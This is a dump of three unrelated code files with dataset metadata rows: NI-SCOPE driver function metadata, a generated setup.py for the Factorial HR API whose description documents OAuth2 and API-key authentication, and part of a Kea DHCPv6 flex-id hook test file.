'description': '\nSets the value of a ViString attribute.\n\nThis is a low-level function that you can use to set the values of\ninstrument-specific attributes and inherent IVI attributes. If the\nattribute represents an instrument state, this function performs\ninstrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level driver functions as much as possible\nbecause they handle order dependencies and multithread locking for you.\nIn addition, the high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the SetAttribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute to. Some values might not\nbe valid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'SetDdcFilterCoefficients': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'channel',
'type': 'ViConstString'
},
{
'direction': 'in',
'name': 'coefficientType',
'type': 'ViInt32'
},
{
'direction': 'in',
'name': 'numCoefficients',
'type': 'ViInt32'
},
{
'direction': 'out',
'name': 'coefficients',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'UnlockSession': {
'documentation': {
'description': '\nReleases a lock that you acquired on an instrument session using\nniScope_LockSession.\n'
},
'method_templates': [
{
'documentation_filename': 'unlock',
'method_python_name_suffix': '',
'session_filename': 'unlock'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nThis parameter serves as a convenience; if you do not want to use this\nparameter, pass VI_NULL.\n\nUse this parameter in complex functions to keep track of whether you\nhave obtained a lock and therefore need to unlock the session; pass the\naddress of a local ViBoolean variable; in the declaration of the local\nvariable, initialize it to VI_FALSE; pass the address of the same local\nvariable to any other calls you make to niScope_LockSession or\nniScope_UnlockSession in the same function.\n'
},
'name': 'callerHasLock',
'type': 'ViBoolean'
}
],
'python_name': 'unlock',
'render_in_session_base': True,
'returns': 'ViStatus',
'use_session_lock': False
},
'close': {
'codegen_method': 'private',
'documentation': {
'description': '\nWhen you are finished using an instrument driver session, you must call\nthis function to perform the following actions:\n\n- Closes the instrument I/O session.\n- Destroys the IVI session and all of its attributes.\n- Deallocates any memory resources used by the IVI session.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus',
'use_session_lock': False
},
'error_message': {
'codegen_method': 'private',
'documentation': {
'description': 'Takes the **Error_Code** returned by the instrument driver functions, interprets it, and returns it as a user-readable string.'
},
'is_error_handling': True,
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'Identifies a particular instrument session. You obtain the **vi** parameter from niScope_init or niScope_InitWithOptions. The default is None.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The **error_code** returned from the instrument. The default is 0, indicating VI_SUCCESS.'
},
'name': 'errorCode',
'type': 'ViStatus'
},
{
'direction': 'out',
'documentation': {
'description': 'The error information formatted into a string.'
},
'name': 'errorMessage',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus',
'use_session_lock': False
},
'error_query': {
'codegen_method': 'no',
'documentation': {
'description': '\nReads an error code and message from the error queue. National\nInstruments digitizers do not contain an error queue. Errors are\nreported as they occur. Therefore, this function does not detect errors.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the error code for the session or execution thread. If you pass\n0 for the Buffer Size, you can pass VI_NULL for this parameter.\n'
},
'name': 'errCode',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nFormats the error code into a user-readable message string. The array\nmust contain at least 256 elements (ViChar[256]).\n'
},
'name': 'errMessage',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'fancy_self_test': {
'codegen_method': 'python-only',
'documentation': {
'description': '\nRuns the instrument self-test routine and returns the test result(s). Refer to the\ndevice-specific help topics for an explanation of the message contents.\n\nRaises `SelfTestError` on self test failure. Attributes on exception object:\n\n- code - failure code from driver\n- message - status message from driver\n',
'table_body': [
[
'0',
'Passed self-test'
],
[
'1',
'Self-test failed'
]
],
'table_header': [
'Self-Test Code',
'Description'
]
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '',
'session_filename': 'fancy_self_test'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
}
],
'python_name': 'self_test',
'returns': 'ViStatus'
},
'init': {
'codegen_method': 'no',
'documentation': {
'description': '\nPerforms the following initialization actions:\n\n- Creates a new IVI instrument driver session\n- Opens a session to the specific driver using the interface and\n address you specify in the **resourceName**\n- Queries the instrument ID and checks that it is valid for NI-SCOPE,\n if the **IDQuery** is set to VI_TRUE\n- Resets the digitizer to a known state, if **resetDevice** is set to\n VI_TRUE\n- Sends initialization commands to set the instrument to the state\n necessary for the operation of the instrument driver\n- Returns an instrument handle that you use to identify the instrument\n in all subsequent instrument driver function calls\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'caution': '\nTraditional NI-DAQ and NI-DAQmx device names are not case-sensitive.\nHowever, all IVI names, such as logical names, are case-sensitive. If\nyou use logical names, driver session names, or virtual names in your\nprogram, you must make sure that the name you use matches the name in\nthe IVI Configuration Store file exactly, without any variations in the\ncase of the characters.\n',
'description': '\n**resourceName** specifies the resource name of the device to\ninitialize.\n\nresourceName Examples\n\nFor Traditional NI-DAQ devices, the syntax is DAQ::\\ *n*, where *n* is\nthe device number assigned by MAX, as shown in Example 1.\n\nFor NI-DAQmx devices, the syntax is just the device name specified in\nMAX, as shown in Example 2. Typical default names for NI-DAQmx devices\nin MAX are Dev1 or PXI1Slot1. You can rename an NI-DAQmx device by\nright-clicking on the name in MAX and entering a new name.\n\nAn alternate syntax for NI-DAQmx devices consists of DAQ::\\ *NI-DAQmx\ndevice name*, as shown in Example 3. This naming convention allows for\nthe use of an NI-DAQmx device in an application that was originally\ndesigned for a Traditional NI-DAQ device. For example, if the\napplication expects DAQ::1, you can rename the NI-DAQmx device to 1 in\nMAX and pass in DAQ::1 for the resource name, as shown in Example 4.\n\nIf you use the DAQ::\\ *n* syntax and an NI-DAQmx device name already\nexists with that same name, the NI-DAQmx device is matched first.\n\nYou can also pass in the name of an IVI logical name or an IVI virtual\nname configured with the IVI Configuration utility, as shown in Example\n5. A logical name identifies a particular virtual instrument. A virtual\nname identifies a specific device and specifies the initial settings for\nthe session.\n',
'table_body': [
[
'1',
'Traditional NI-DAQ device',
'DAQ::\\ *1*',
'(*1* = device number)'
],
[
'2',
'NI-DAQmx device',
'*myDAQmxDevice*',
'(*myDAQmxDevice* = device name)'
],
[
'3',
'NI-DAQmx device',
'DAQ::\\ *myDAQmxDevice*',
'(*myDAQmxDevice* = device name)'
],
[
'4',
'NI-DAQmx device',
'DAQ::\\ *2*',
'(*2* = device name)'
],
[
'5',
'IVI logical name or IVI virtual name',
'*myLogicalName*',
'(*myLogicalName* = name)'
]
],
'table_header': [
'Example #',
'Device Type',
'Syntax',
'Variable'
]
},
'name': 'resourceName',
'type': 'ViRsrc'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to perform an ID query.\n\nWhen you set this parameter to VI_TRUE, NI-SCOPE verifies that the\ndevice you initialize is a type that it supports.\n\nWhen you set this parameter to VI_FALSE, the function initializes the\ndevice without performing an ID query.\n\n**Defined Values**\n\n| VI_TRUE—Perform ID query\n| VI_FALSE—Skip ID query\n\n**Default Value**: VI_TRUE\n'
},
'name': 'idQuery',
'type': 'ViBoolean'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to reset the device during the initialization process.\n\n**Defined Values**\n\n| VI_TRUE—Reset device\n| VI_FALSE—Do not reset device\n\n**Default Value**: VI_TRUE\n',
'note': '\nFor the NI 5112, repeatedly resetting the device may cause excessive\nwear on the electromechanical relays. Refer to `NI 5112\nElectromechanical Relays <REPLACE_DRIVER_SPECIFIC_URL_1(5112_relays)>`__\nfor recommended programming practices.\n'
},
'name': 'resetDevice',
'type': 'ViBoolean'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns a session handle that you can use to identify the device in all\nsubsequent NI-SCOPE function calls.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'reset': {
'documentation': {
'description': "\nStops the acquisition, releases routes, and all session attributes are\nreset to their `default\nstates <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cviattribute_defaults)>`__.\n"
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'revision_query': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the revision numbers of the instrument driver and instrument\nfirmware.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the instrument driver software revision numbers in the form of a\nstring; you must pass a ViChar array at least\nIVI_MAX_MESSAGE_BUF_SIZE bytes in length.\n'
},
'name': 'driverRevision',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the instrument firmware revision numbers in the form of a\nstring; you must pass a ViChar array at least\nIVI_MAX_MESSAGE_BUF_SIZE bytes in length.\n'
},
'name': 'firmwareRevision',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'self_test': {
'codegen_method': 'private',
'documentation': {
'description': 'Runs the instrument self-test routine and returns the test result(s).'
},
'method_name_for_documentation': 'self_test',
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nThis control contains the value returned from the instrument self-test.\n\n**Self-Test Code Description**\n\n0—Self-test passed\n\n1—Self-test failed\n'
},
'name': 'selfTestResult',
'type': 'ViInt16'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the self-test response string from the instrument. Refer to the\ndevice-specific help topics for an explanation of the string contents;\nyou must pass a ViChar array at least IVI_MAX_MESSAGE_BUF_SIZE bytes\nin length.\n'
},
'name': 'selfTestMessage',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
}
}
| 53.017618
| 1,778
| 0.540476
| 29,993
| 312,963
| 5.565099
| 0.055646
| 0.08469
| 0.05507
| 0.079682
| 0.795607
| 0.768252
| 0.74651
| 0.722138
| 0.709863
| 0.697521
| 0
| 0.006619
| 0.360356
| 312,963
| 5,902
| 1,779
| 53.026601
| 0.826625
| 0.000284
| 0
| 0.568475
| 1
| 0.060339
| 0.625581
| 0.081148
| 0
| 0
| 0
| 0
| 0.000508
| 1
| 0
| false
| 0.008644
| 0.001525
| 0
| 0.001525
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ebcc3825fc097277e9fdeaf71248a959aca3f78e
| 14,706
|
py
|
Python
|
sdk-python/setup.py
|
factorialco/oas
|
8a2fc3b519b7e74566c94ebd220590d7a9c38aa3
|
[
"Apache-2.0"
] | 1
|
2021-11-15T21:36:01.000Z
|
2021-11-15T21:36:01.000Z
|
sdk-python/setup.py
|
factorialco/oas
|
8a2fc3b519b7e74566c94ebd220590d7a9c38aa3
|
[
"Apache-2.0"
] | null | null | null |
sdk-python/setup.py
|
factorialco/oas
|
8a2fc3b519b7e74566c94ebd220590d7a9c38aa3
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Factorial API
Open Api Specifications available at [https://github.com/factorialco/oas](https://github.com/factorialco/oasLooking) Guides and support available at [https://help.factorialhr.com/integrations](https://help.factorialhr.com/integrations) # Authentication The public API provides two methods of authentication, ApiKeys and OAuth2. The following sections provide information regarding each one and their intent. ## OAuth2 > OAuth2 is used to identify individual users, not applicatins or platforms. OAuth2 is available for authenticating to the public API and making requests via third parties **on behalf of a user**. All actions are authored on behalf of the user that creates the token. This means the intent is to be used mainly to do submit actions the actual user is performing on an alternative interface. To generate a token you will require opening an authorization dialog that returns a code, this code can then be exchanged for a token. ### Configuration In order to create an OAuth application, you must be an admin, head over to your [personal repository of OAuth applications](https://api.factorialhr.com/oauth/applications), click on `New application` and follow the creation process. The Factorial API enforces the same permissions at the user level than the Factorial web application. This means that Factorial API users will only be able to perform the same actions they are allowed to do in the Factorial platform. Next step will be to generate the Authorization Code you will need in order to generate an OAuth2 Token. ### OAuth2 Code Generation Should be generated via browser by opening the following url. The user should be already logged in to Factorial beforehand. `https://api.factorialhr.com/oauth/authorize?client_id=&redirect_uri=&response_type=code&scope=` YOUR_CLIENT_ID: OAuth2 Application Id REDIRECT_URI: OAuth2 Redirect URL #### State Parameter An optional query parameter called `state` can be added to the code generation url. Any string can be used and will be sent on the callback url. > Authorization protocols provide a `state` parameter that allows you to restore the previous state of your application. The `state` parameter preserves some state objects set by the client in the Authorization request and makes it available to the client in the response. ### OAuth2 Token Generation Once you have the authorization code, you can request their access token to Factorial. `curl -X POST 'https://api.factorialhr.com/oauth/token' -d 'client_id=&client_secret=&code=&grant_type=authorization_code&redirect_uri='` YOUR_CLIENT_ID: OAuth2 Application Id YOUR_CLIENT_SECRET: OAuth2 Application Secret AUTHORIZATION_CODE: OAuth2 CODE REDIRECT_URI: OAuth2 Redirect URL > You can generate only one OAuth2 token per Code, that means that if you want to generate a new token for a Code that already have one you should refresh your token. Every time a new token is generated a refresh token is generated as well, so that you can use it on the OAuth2 Refresh Token, and an expire date is also provided. ### OAuth2 Refresh Token You can generate a new token under the same Code with a new expire date (you can do it as many times as you need). A refresh token is also returned here so that you can use it on the OAuth2 Refresh Token again. `curl -X POST 'https://api.factorialhr.com/oauth/token' -d 'client_id=&client_secret=&refresh_token=&grant_type=refresh_token'` YOUR_CLIENT_ID: OAuth2 Application Id YOUR_CLIENT_SECRET: OAuth2 Application Secret REFRESH_TOKEN: OAuth2 Refresh Token ### OAuth2 Token Usage The generated token is the credential for performing authenticated requests to Factorial. This token should be included in the Authorization header prefixed with the word Bearer and a separating space. As an example, if your token is `12345` then the header content should be `Bearer 12345`. ### Maintaining a persistent connection To maintain a persistent connection, you should not let the token expire. You can avoid this by simply refreshing your token before the expiration date. This will give you another token with a new expiration date, before that token expires you should refresh it again, and so on... If you want to do this automatically, you should provide something in your code that will help you perform the update every time the token expires. Otherwise, you would have to do the update manually and make sure you refresh your token before the expiration date to maintain the connection. ## ApiKeys > API keys are used to identify systems, not the individual users that access. ApiKeys have **TOTAL ACCESS** to everything and never expire. Its the creators responsability to generate them and store them securely. ### Generation In the `Core>Keys` section of this documentation you can access the apis for managing this resource. ### Usage ApiKeys are a single string of symbols that must be added as a custom header on the request. The header name must be `x-api-key` and the key must be the value without any prefixes. ### Disclaimer ApiKey management require full admin permissions as the resource itself allows for full admin access to the entire platform on behalf of the company and not of a user, therefore any operations are not linked to any user in particular. # Development ## SDKs Coming soon ## Sandbox A sandbox/demo environment is available for testing integrations via public API calls. Developers can request provisioning with full access to a demo company where to test code before actually interacting with a production environment. Contact your account manager or account executive to request this environment and get OAuth2 credentials for generating tokens. Note: the domain for sandbox is different than that from production. Sandbox base domain is `http://api.demo.factorialhr.com` ## Postman Click the \"Run in Postman\" button to open the full list of endpoints on your Postman workspace as a Postman Collection. Inside the collection lookout for the Collection's Variables, configure your variables accordingly. ### Delegating Token Generation To Postman Coming soon # Changelog Coming soon # How to... ## Custom Fields Custom fields are useful when you want to add some fields that are not the default ones, to every employee of the company. For that, you have to create via Factorial App the base custom field in order to have all the employees with it. That option is available in customization, inside the company menu Once you have that, via API, you can [Create a value for a custom field](https://apidoc.factorialhr.com/#72f3f786-e37d-4e80-ada2-0beedd03b171) to each employee. You should know the custom field id in order to make that, you can check it by [getting a collection of custom fields](https://apidoc.factorialhr.com/#f98dae5a-a8d0-474e-a181-7e9603409b42) # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from setuptools import setup, find_packages # noqa: H301
NAME = "swagger-client"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["urllib3 >= 1.15", "six >= 1.10", "certifi", "python-dateutil"]
setup(
name=NAME,
version=VERSION,
description="Factorial API",
author_email="",
url="",
keywords=["Swagger", "Factorial API"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Open Api Specifications available at [https://github.com/factorialco/oas](https://github.com/factorialco/oasLooking) Guides and support available at [https://help.factorialhr.com/integrations](https://help.factorialhr.com/integrations) # Authentication The public API provides two methods of authentication, ApiKeys and OAuth2. The following sections provide information regarding each one and their intent. ## OAuth2 > OAuth2 is used to identify individual users, not applicatins or platforms. OAuth2 is available for authenticating to the public API and making requests via third parties **on behalf of a user**. All actions are authored on behalf of the user that creates the token. This means the intent is to be used mainly to do submit actions the actual user is performing on an alternative interface. To generate a token you will require opening an authorization dialog that returns a code, this code can then be exchanged for a token. ### Configuration In order to create an OAuth application, you must be an admin, head over to your [personal repository of OAuth applications](https://api.factorialhr.com/oauth/applications), click on `New application` and follow the creation process. The Factorial API enforces the same permissions at the user level than the Factorial web application. This means that Factorial API users will only be able to perform the same actions they are allowed to do in the Factorial platform. Next step will be to generate the Authorization Code you will need in order to generate an OAuth2 Token. ### OAuth2 Code Generation Should be generated via browser by opening the following url. The user should be already logged in to Factorial beforehand. `https://api.factorialhr.com/oauth/authorize?client_id=&redirect_uri=&response_type=code&scope=` YOUR_CLIENT_ID: OAuth2 Application Id REDIRECT_URI: OAuth2 Redirect URL #### State Parameter An optional query parameter called `state` can be added to the code generation url. Any string can be used and will be sent on the callback url. > Authorization protocols provide a `state` parameter that allows you to restore the previous state of your application. The `state` parameter preserves some state objects set by the client in the Authorization request and makes it available to the client in the response. ### OAuth2 Token Generation Once you have the authorization code, you can request their access token to Factorial. `curl -X POST 'https://api.factorialhr.com/oauth/token' -d 'client_id=&client_secret=&code=&grant_type=authorization_code&redirect_uri='` YOUR_CLIENT_ID: OAuth2 Application Id YOUR_CLIENT_SECRET: OAuth2 Application Secret AUTHORIZATION_CODE: OAuth2 CODE REDIRECT_URI: OAuth2 Redirect URL > You can generate only one OAuth2 token per Code, that means that if you want to generate a new token for a Code that already have one you should refresh your token. Every time a new token is generated a refresh token is generated as well, so that you can use it on the OAuth2 Refresh Token, and an expire date is also provided. ### OAuth2 Refresh Token You can generate a new token under the same Code with a new expire date (you can do it as many times as you need). A refresh token is also returned here so that you can use it on the OAuth2 Refresh Token again. `curl -X POST 'https://api.factorialhr.com/oauth/token' -d 'client_id=&client_secret=&refresh_token=&grant_type=refresh_token'` YOUR_CLIENT_ID: OAuth2 Application Id YOUR_CLIENT_SECRET: OAuth2 Application Secret REFRESH_TOKEN: OAuth2 Refresh Token ### OAuth2 Token Usage The generated token is the credential for performing authenticated requests to Factorial. This token should be included in the Authorization header prefixed with the word Bearer and a separating space. As an example, if your token is `12345` then the header content should be `Bearer 12345`. ### Maintaining a persistent connection To maintain a persistent connection, you should not let the token expire. You can avoid this by simply refreshing your token before the expiration date. This will give you another token with a new expiration date, before that token expires you should refresh it again, and so on... If you want to do this automatically, you should provide something in your code that will help you perform the update every time the token expires. Otherwise, you would have to do the update manually and make sure you refresh your token before the expiration date to maintain the connection. ## ApiKeys > API keys are used to identify systems, not the individual users that access. ApiKeys have **TOTAL ACCESS** to everything and never expire. Its the creators responsability to generate them and store them securely. ### Generation In the `Core>Keys` section of this documentation you can access the apis for managing this resource. ### Usage ApiKeys are a single string of symbols that must be added as a custom header on the request. The header name must be `x-api-key` and the key must be the value without any prefixes. ### Disclaimer ApiKey management require full admin permissions as the resource itself allows for full admin access to the entire platform on behalf of the company and not of a user, therefore any operations are not linked to any user in particular. # Development ## SDKs Coming soon ## Sandbox A sandbox/demo environment is available for testing integrations via public API calls. Developers can request provisioning with full access to a demo company where to test code before actually interacting with a production environment. Contact your account manager or account executive to request this environment and get OAuth2 credentials for generating tokens. Note: the domain for sandbox is different than that from production. Sandbox base domain is `http://api.demo.factorialhr.com` ## Postman Click the \"Run in Postman\" button to open the full list of endpoints on your Postman workspace as a Postman Collection. Inside the collection lookout for the Collection's Variables, configure your variables accordingly. ### Delegating Token Generation To Postman Coming soon # Changelog Coming soon # How to... ## Custom Fields Custom fields are useful when you want to add some fields that are not the default ones, to every employee of the company. For that, you have to create via Factorial App the base custom field in order to have all the employees with it. That option is available in customization, inside the company menu Once you have that, via API, you can [Create a value for a custom field](https://apidoc.factorialhr.com/#72f3f786-e37d-4e80-ada2-0beedd03b171) to each employee. You should know the custom field id in order to make that, you can check it by [getting a collection of custom fields](https://apidoc.factorialhr.com/#f98dae5a-a8d0-474e-a181-7e9603409b42) # noqa: E501
"""
)
| 367.65
| 7,123
| 0.785598
| 2,335
| 14,706
| 4.921627
| 0.162741
| 0.010442
| 0.006265
| 0.015315
| 0.910982
| 0.903498
| 0.898625
| 0.898364
| 0.890707
| 0.890707
| 0
| 0.019649
| 0.155583
| 14,706
| 39
| 7,124
| 377.076923
| 0.905782
| 0.48198
| 0
| 0
| 0
| 0.055556
| 0.9537
| 0.038781
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ebd1272e73933e29f972fbc9568feb6d0204d767
| 50,497
|
py
|
Python
|
tests/dhcpv6/kea_only/flexid/test_flex_id.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 22
|
2015-02-27T11:51:05.000Z
|
2022-02-28T12:39:29.000Z
|
tests/dhcpv6/kea_only/flexid/test_flex_id.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 16
|
2018-10-30T15:00:12.000Z
|
2019-01-11T17:55:13.000Z
|
tests/dhcpv6/kea_only/flexid/test_flex_id.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 11
|
2015-02-27T11:51:36.000Z
|
2021-03-30T08:33:54.000Z
|
"""Kea Hook flex-id testing"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_msg
import misc
import srv_control
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_1():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'\'port1234\'')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'substring(relay6[0].option[18].hex,0,8)')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
# Relayed Message sub-option 5 from option 3 MUST contain address 2001:db8:1::1.
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_libreload():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'\'port1234\'')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'substring(relay6[0].option[18].hex,0,8)')
srv_control.open_control_channel()
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
# Relayed Message sub-option 5 from option 3 MUST contain address 2001:db8:1::1.
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
srv_msg.send_ctrl_cmd_via_socket('{"command": "libreload","arguments": {}}')
# if reload works - classification should work without changes
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
# Relayed Message sub-option 5 from option 3 MUST contain address 2001:db8:1::1.
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_reconfigure_1():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'\'port1234\'')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'substring(relay6[0].option[18].hex,0,8)')
srv_control.open_control_channel()
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
